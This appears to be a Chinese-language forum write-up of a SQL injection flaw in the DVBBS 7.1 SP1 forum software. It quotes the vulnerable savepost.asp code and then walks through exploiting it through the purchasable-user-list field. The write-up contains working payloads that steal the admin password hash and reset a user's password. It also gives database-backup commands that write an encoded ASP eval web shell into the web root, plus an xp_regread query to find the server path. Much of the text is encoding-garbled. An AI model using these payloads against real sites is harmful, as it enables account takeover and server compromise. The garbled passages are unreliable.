dvbbs7.1sp1最新漏洞的研究和利用

漏洞分析：
因为程序在savepost.asp文件中变量过滤不严,导致数æåº“处理产生漏洞,可以取得èºå›æ‰€æœ‰æƒé™ä»¥åŠwebshell。已经提交å˜æ–¹å¡æ ¸ï¼Œå¹¶é€šè¿‡ç¡è¤ï¼Œè¡¥ä¸å·²ç»å…¬å¸ƒ

厂商补丁：
http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1

看到下面：
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0
    If Buy_UserList"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","")
    ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||"
    GetMoneyType = 3
    'UseTools = ToolsInfo(4)
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

再朝下看：
Public Sub Insert_To_Announce()
'插入回复表
DIM UbblistBody
UbblistBody = Content
UbblistBody = Ubblist(Content)
SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")"
Dvbbs.Execute(sql)

可以看到Buy_UserList这个变量过滤有é—题，呵呵，这个变量又导致ToolsBuyUser这个变量有é—题。的ç¡æ˜¯å¯ä»¥æ³¨å°„，呵呵。
在悔过头来看补丁里面：
insert里面有ä¿è¡¥ï¼š&dvbbs.checkstr(ToolsBuyUser)&"
看来应该是这个地方了。
åˆç”¨èµ·æ¥æœ€å¥½æ˜¯sql版本，可以updata改ç¡ç†å‘˜å¯†ç ï¼Œæˆ–者å·å¼‚备份得shell。
åˆç”¨åŠžæ³•å˜›ï¼Œå…ˆæ³¨å†Œä¸€ä¸ªid，找个版面发帖子，
帖子内å¹ä¸‹é¢æœ‰ä¸ªé€‰æ‹å¸–子类型。
选æ‹ï¼ï¼ï¼èºå›äº¤æ˜“币è¾ç½ã€‚
下面是表单内å¹ã€‚

看源代码：
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
选æ‹å¸–子类型
赠送金币贴
获赠金币贴
èºå›äº¤æ˜“帖è¾ç½

金币数量：

购买数量限制：(è¾ç½ä¸ºâ€œ-1”则不限制)

VIP用户浏览选项：不需要购买，需要购买

可购买用户名单限制：(每个用户名用英文逗号“,”分隔符分开，注意区分大小写)

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
就是这个地方了，hoho。
下面有个“可购买名单限制”，里面就填写：
xjy111',0);update/**/Dv_User/**/set/**/UserEmail=(select[Password]from/**/Dv_admin/**/where[Username]='yellowcat')/**/where[UserName]='qq156544632';--

提交成功。
看看我的Email。
晕死，居然成了çºç™½ã€‚不知道为什么哈。
来点直接的：

coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='qq156544632';--
这回好了，先退出，用admin888这个密码直接成功登录。
好了，语句没有é—题，大å¶çŽ°åœ¨å¯ä»¥è‡ªç”±å‘挥，会写工具的，吧delphi什么的搬出来。
直接改ç¡ç†å‘˜çš„密码进后台，可以恢复数æåº“的办法得到shell（参考angel的文章，dvbbs7.1sql版本依然可以吧）
或者å·å¼‚备份（后台可以看到web绝对路径）：

create table aspshell (str image);

declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.bak;

insert into aspshell values(0x3C256576616C20726571756573742822232229253E);
declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.asp' with differential;

drop table aspshell;

另外一种得到web绝对路径办法(从职业欠钱兄弟那里看到的)
create table regread(a varchar(255),b varchar(255));
（建立一个临时表，存放读取到的信息）
insert regread exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots', '/'
（使用xp_regread这个函数读取注册表信息得到虚拟ç›å½•è·¯å¾„，并存入临时表中）
update dv_boke_user set boketitle=(select top 1 b from regread) where bokename='admin'

至于acess版本没有研ç¶ã€‚

[至于工具，åžåœ¨æ²¡å¿…要写，因为åˆç”¨èµ·æ¥å¾ˆç€å•ï¼ŒæŠŠæ‰€åˆç”¨çš„注入语句复制粘贴一下就可以了。对于动网SQL版，我感觉危å³æ¯”当初的上传漏洞还要严重，因为操作起来很方便。希望大å¶æœ¬ç€ä¸€ç§å­¦ä¹ æŠ€æœ¯çš„心态，不要对存在漏洞的站点åžæ–½ç ´åæ”»å‡»ï¼ï¼ï¼â€”—
http://aliwy.77169.com